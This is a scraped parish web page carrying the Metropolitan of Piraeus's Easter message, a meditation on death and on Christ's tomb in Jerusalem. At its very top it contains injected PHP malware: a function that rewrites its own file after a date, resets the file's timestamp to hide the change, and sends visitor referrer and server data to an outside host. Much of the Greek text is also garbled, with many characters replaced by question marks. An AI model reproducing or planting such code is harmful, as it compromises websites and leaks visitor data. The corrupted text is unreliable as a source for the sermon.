check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Create PDF Recommend Print

Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Πασχαλινό μήνυμα Σεβασμιωτάτου Μητροπολίτου Πειραιώς κ.κ. Σεραφείμ

Πατέρες κα? ?δελφοί, τέκνα ?ν Κυρί? ?γαπητ? κα? περιπόθητα ΧΡΙΣΤΟΣ ΑΝΕΣΤΗ!

Πλησιάζουμε τ?ν ?γία Πόλη ?ερουσαλ?μ τ? Μεγάλο Σάββατο, ε?μαστε ?σως ?ρκετ? προετοιμασμένοι γι? ν? καταλάβουμε κάπως τ? μυστήριο κα? τ?ς ?ερουσαλ?μ κα? το? Μ. Σαββάτου.

Γιατ? ?χουμε ?ντονα στ?ν ψυχή μας τ? γεύση το? θανάτου. Δ?ν ε?ναι μόνο ? ?μπειρία, πο? ?λοι ο? ?νθρωποι ?χουμε κάποτε, τ? στιγμ? πο? βλέπουμε ?να ?γαπητ? κα? ο?κε?ο μας πρόσωπο, ?να συγκεκριμένο γνωστ? ?νθρωπο μ? τ?ν ?πο?ο ε?χαμε ζήσει κα? συνεργασθ?, ν? βρίσκεται μπροστά μας ?κίνητος κα? ?νέκφραστος? τ? στιγμ? πο? το? μιλήσαμε κα? δ?ν μ?ς ?πάντησε, πο? τ?ν ?γγίξαμε κα? νοιώσαμε τ? χαρακτηριστικ? κρύο ρ?γος ν? διαπερνάη τ?ν ?παρξή μας.

Ε?ναι κα? ? ?μπειρία πο? δίνει στ? σημεριν? ?νθρωπο ? ?στορία το? θανάτου τ?ν πολιτισμ?ν. Γιατ? ?νας ?νθρωπος μπορε? βέβαια ?π? μι? ?ποψη ν? ?πιβιώση μέσα ?π? τ? παιδί του κα? τ? ?ργο του ν? συνεχισθ?. ?τσι ? ?νθρωπότητα ?ς σύνολο κατώρθωσε κα? ?ψώθηκε μερικ?ς φορ?ς σ? σημε?α ?κπληκτικά. ?λλ? ? φθορ? σταμάτησε τ?ν ?ξέλιξη κα? ? θάνατος ?κανε παρελθ?ν κα? το?ς μεγαλύτερους πολιτισμούς. Τ? μεγάλα ?στορικ? μνημε?α ε?ναι τ? μνήματα τ?ν πολιτισμ?ν.

Τ?ν ?δια α?τ? γεύση νοιώθει ? ?νθρωπος κα? πολλ?ς φορές, ?ταν ?γωνίζεται ν? δημιουργήση στ? ζωή του κάτι τ? σοβαρό. ? δαμόκλειος σπάθη το? θανάτου κρέμεται πάνω του κα? τ? μι? ? τ?ν ?λλη στιγμ? πέφτει κα? διακόπτει ?δυνηρ? τ? ?ργο του.

«Πολλ? τ? δειν? κο?δ?ν ?νθρώπου δεινότερον πέλει», ?λεγαν ο? ?ρχα?οι. ?λλ? ? φθορ? ?ποδεικνύεται συχν? πι? φοβερ? ?π? τ?ν ?νθρωπο. Πρ?ν ?π? τ? γ?, πο? ?ναπόφευκτα θ? ρουφήξη στ? μν?μα τ? σάρκα του, ?πομυζ? τ?ν ζωτικότητα κα? τ? ?νδιαφέρον το? ?νθρώπου γι? τ? ζωή. Ο? μέρες μπορο?ν ?τσι ν? κυλο?ν χωρ?ς σκοπό, ?σήμαντα γεγονότα μπορο?ν ν? γεμίζουν τ? χρόνο του, μι? δίνη πραγμάτων χωρ?ς νόημα καταντάει ν? κάνη τελικ? ?νόητη τ?ν ?δια τ? ζωή. ?νας ?νθρωπος, πο? ζ? σ? μι? ?π? τ?ς μεγάλες ε?ρωπαϊκ?ς πόλεις, νοιώθει συχν? τ? α?σθημα το? ?λίγγου, πο? δημιουργε? α?τ? ? κατάσταση, τ? α?σθημα τ?ς «ναυτίας». «Ο? Νεκρο? χωρ?ς τάφο» το? Sartre (Σαρτρ), πο? διαφημίζονται στ?ς προθ?κες τ?ν περιπτέρων κα? τ?ν βιβλιοπωλείων ?κφράζουν παραστατικ? τ? βαθει? πικρία πο? ?ποτελε? στ? βάθος της ? ζω? γι? τ? μεγάλη μάζα τ?ν ?νθρώπων, πο? κινε?ται καθημεριν? στ? κέντρο τ?ν μεγαλοπόλεων.

? ?γιος Νικόλαος Καβάσιλας, ?νας μεγάλος θεολόγος, πο? ?ζησε στ? Θεσσαλονίκη στ? μεταίχμιο Μεσαίωνα κα? ?ναγεννήσεως, τ? ΙΔ΄ α?ώνα, μιλάει μ? ?νάργεια γι? το?ς ζωντανο?ς βιολογικά, ?λλ? νεκρο?ς ο?σιαστικ? ?νθρώπους, γι? τ? «νεκρ? τέκνα, Πατέρων νεκρ?ν».

? ?μπειρία, λοιπ?ν α?τ? μπορε? ν? βοηθήσει ?ναν ?νθρωπο, πο? ?πισκέπτεται τ? ?εροσόλυμα τ? Μεγάλο Σάββατο. ?πως τ? ?εροπλάνο, ?χοντας ?φήσει πίσω του τ?ν ?ορδάνη, πετάει πρ?ς το?ς λόφους τ?ς ?ερουσαλήμ, ?ρχίζει ν? φαίνεται ? πόλη. Ε?ναι σ?ν ?λες τ?ς ?λλες πόλεις τ?ς γ?ς. Μ? τ? σπίτια, τ?ν κίνηση, τ? θόρυβό της, μ? τ? φθορ? ν? ?πομυζ? κα? ?δ? τ? ζω? τ?ν ?νθρώπων. Στ?ν πόλη α?τ? ε?ναι πο? ?ζησε σ?ν ?νθρωπος ? Θεός. Περπάτησε στο?ς δρόμους της, π?γε στ? ναό της, θαυματούργησε, μίλησε, σταυρώθηκε. ?δ? βρίσεται ? τάφος Του.

Μ? γνωρίζοντας ο?τε τ?ν πόλη ο?τε τ?ν γλ?σσα ? ?νθρωπος περιπλαν?ται στο?ς δρόμους. Βλέπει το?ς ?πλο?ς κα? θορυβώδεις ?νατολίτες ν? πηγαίνουν βιαστικο? στ?ς δουλειές τους κα? νιώθει ρίγος. ?φ ?σον ?ρθε στ? γ?, σ' α?τ? ?δ? τ? συγκεκριμένη γ? κα? ?ζησε τ?ν ?νθρώπινη, α?τ? ?δ? τ? συγκεκριμένη ?νθρώπινη ζω? ? Θεός, τότε ? ?νθρώπινη ζω? ?χει νόημα κα? ?νδιαφέρον.

Σ' ?να μεγάλο κτίσμα βλέπει μι? ?πιγραφ? πο? λέει ?τι ?δ? ε?ναι τ? Παλάτι το? ?ρώδη. ? σάρκωση το? Λόγου ε?ναι λοιπ?ν ?να φαινόμενο ?στορικό. ?σως γι? πρώτη φορ? συνειδητοποιε? τ? θ? π? τ?: «σαρκωθέντα ?κ Πνεύματος ?γίου κα? Μαρίας τ?ς Παρθένου κα? ?νανθρωπήσαντα, σταυρωθέντα τε ?π? Ποντίου Πιλάτου κα? παθόντα κα? ταφέντα». Τόσο πολ? ?γάπησε ? Θε?ς τ?ν ?νθρωπο, ?στε κενώθηκε μέσα στ?ν ?στορία. ?ρθε κα? ?νώθηκε τόσο στεν? μ? τ?ν κτίση Του, ?στε α?τ? ? πόλη ν? μ?ν ε?ναι ?πλ?ς τ? ?εροσόλυμα, ?λλ? ν? ε?ναι ? «Καιν? Πόλις ?ερουσαλήμ».

Στ? να? τ?ς ?ναστάσεως, πο? φθάνει σ? λίγο, χάνεται μέσα στ?ς πολλ?ς στο?ς κα? τ? παρεκκλήσια. ?χει τ?ν α?σθηση ?τι ? τόπος ε?ναι σ?ν τ?ν «φλεγόμενη βάτο». ?δ? ε?ναι ? Γολγοθ?ς. ?λος ? τόπος ?δ? ε?ναι Πνευματικός. Α?τ? ε?ναι ? Καιν? ?ερουσαλήμ. ? συγκεκριμένη ?στορικ? πόλη, γεμάτη ?π? τ? Πνε?μα το? Θεο?? ? ?νάκραση το?κτιστο? μετ? το? ?κτίστου.

Πρ?ς τ? κέντρο βλέπει ?να κουβούκλιο, μπροστ? στ? ?πο?ο κα?νε λαμπάδες πολλές. Προχωρε?, κα? μπαίνει. Στ? βάθος, μέσα ?π? ?να χαμηλ? ?νοιγμα, φαίνεται μι? μεγάλη, ?σπρη, παραλληλόγραμμη πέτρα. Σκύβει κα? μπαίνει. Γονατίζει. Δ?ν ξέρει πο? βρίσκεται, ?λλ? προσεύχεται κα? κλαίει. Κλαίει γι? τ?ν ?νούσια ζω? τ?ς πόλεως, γι? τ?ν πίκρα, πο? ε?ναι ? καθημεριν? τροφή του, γι? τ? χάος, πο? βλέπει ν? ?πάρχει μέσα του, γι? τ?ν ?μαρτία, πο? το? κατατρώει τ?ν ?παρξη κα? πο? ?ψώνεται μέσα του σ?ν ?βρις πρ?ς τ?ν Θεό? τ?ν Θε? πο? μολαταύτα, Α?τ?ς ?θελε ν? ?γαπάη. Σηκώνοντας τ? μάτια του διαβάζει πάνω ?π' τ?ν Πέτρα τ? φράση το? Ε?αγγελίου «κα? κατέθηκεν α?τ?ν ?ν μνημεί?, ? ?ν λελατομημένον ?κ πέτρας» κα? καταλαβαίνει. Βρίσκεται μέσα σ' ?να Τάφο. ? πέτρα πάνω στ?ν ?ποία ?κουμπάει τ? κεφάλι του ε?ναι μι? ταφόπετρα. Κι ?μως νοιώθει ο?κε?ο τ? μέρος. Μι? γλυκει? παρηγορι? τ?ν γεμίζει. Γιατ? νοιώθει ?τι στ? μέρος α?τ? δ?ν ε?ναι μόνος, ?ρθε πρ?ν ?π? α?τ?ν ? Χριστός. ? Χριστ?ς δ?ν ?ρθε, λοιπόν, μόνο στ? ζω? το? ?νθρώπου. Κατέβηκε ?ς τ? θάνατο. Γεύθηκε ?λη τ?ν πικρία το? θανάτου, ?ρα, ε?ναι κοντά μας, ?στω κα? ?ν ε?μαστε νεκροί. ?σο χαμηλ? κα? ?ν πέσουμε, ? Χριστ?ς πρ?ν ?π? μ?ς γι? μ?ς κατέβηκε στ?ν ?δη. Κι ?ν πεθάνουμε, μέσα στ? χάος το? θανάτου μ?ς περιμένει ? Χριστός.

Α?τ? τ? μν?μα ε?ναι πολ? στοργικό. ? κάθε ?νας ?π? μ?ς ?κε? νοιώθει μι? βαθει? γαλήνη κα? σιγουριά. Θέλει ν? σηκωθ?, ?λλ? τ? γόνατά του ε?ναι μουδιασμένα. ?κουμπάει τ?ς δυ? παλάμες του στ?ν Πέτρα, κα? σηκώνεται. Α?σθάνεται τ?ς παλάμες του γεμ?τες ζωή.

Προχωρε? δεξι? κα? ?ριστερά, μέσα στ? Ναό. ?νεβαίνει τ?ς ?ναβαθμίδες κα? βλέπει μπροστά του τρε?ς μεγάλους ξύλινους σταυρούς. Καταλαβαίνει ?τι βρίσκεται στ? Γολγοθ?. Πέφτει ?πάνω στ? βράχο κα? ? καρδιά του σχίζεται καθ?ς διαπιστώνει ?τι ? Πέτρα ε?ναι πραγματικ? σχισμένη. «Κα? ?δού, τ? καταπέτασμα το? ναο? ?σχίσθη ε?ς δύο, ?π? ?νωθεν ?ως κάτω, κα? ? γ? ?σείσθη κα? α? πέτραι ?σχίσθησαν κα? τ? μνημε?α ?νεώχθησαν κα? πολλ? σώματα τ?ν κεκοιμημένω ?γίων ?γέρθησαν».

?ταν ξανακαταβαίνει στ?ν Τάφο ?γκαλιάζει πάλι τ?ν Ταφόπετρα. Νοιώθει ?τι α?τ? ? Πέτρα ε?ναι τ? σ?μα του. ?π? Α?τ?ν στ?ν ?νάσταση ?νέτειλε ?π? μέσα τ? ?κτιστο φ?ς πο? δίδει ? Α?ώνιος Θε?ς μόνον στ?ν ?κλεκτή του Νύμφη, τ?ν ?γία μας ?ρθόδοξη Καθολικ? ?κκλησία. Ε?ναι λοιπ?ν Πέτρα Πνευματική. Ε?ναι πνευματικ? τ? κέντρο τ?ς γ?ς, τ? κέντρο το? θανάτου, τ? κέντρο τ?ς ζω?ς. Ε?ναι τ? κέντρο τ?ς Καιν?ς ?ερουσαλήμ, τ? κέντρον τ?ς ?κκλησίας. Α?τ? ? πέτρα ε?ναι τ? π?ν. ?νώνει τ?ν ο?ραν? κα? τ? γ?, τ? θάνατο κα? τ? ζωή. Πάνω σ' α?τ? τ?ν Πέτρα συνετρίβη τελειωτικ? ? φθορά.

Πέρασαν ?τσι ?ρες πολλές. ? ?νθρωπος νοιώθει τώρα ?λλος ?νθρωπος. Νοιώθει ?τι ? Χριστός του τ?ν κυνήγησε ν? τ?ν βρ? κα? ν? τ?ν σώση στ? γ?, κα? ?φο? α?τ?ς ?ταν νεκρός, κατέβηκε ν? τ?ν συναντήση στ? θάνατο: «?π? γ?ς κατ?λθε ?να σώσ? ?δ?μ κα? ?ν γ? μ? ε?ρηκώς, μέχρις ?δου κατελήλυθε ζητ?ν».

Σηκώνεται κα? βγαίνει ?ξω ?π? τ? Ναό. Θέλει ν? τρέξη ?πως ο? Μαθητ?ς ν? π? στο?ς ?δελφούς του, ?τι ?ναστήθηκε ? Χριστός. Ν? τ? τραγουδήσ? σ? ?λους το?ς τόνους. Γιατ? α?τ? σημαίνει ?τι νικήθηκε ? θάνατος. ?τι ?χει νόημα ? ζωή. Γιατ? α?τ? σημαίνει ?τι μπορο?με ν? ?ναστηθο?με ?λοι. Κα? ο? νεκροί, πο? ε?ναι στ? μνήματα, κα? ο? ?λλοι, ο? «χωρ?ς Τάφο νεκροί».

 

«Χριστ?ς ?νέστη», ?δελφοί !

Ο ΜΗΤΡΟΠΟΛΙΤΗΣ ΣΑΣ

+ ? Πειραι?ς ΣΕΡΑΦΕΙΜ

 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;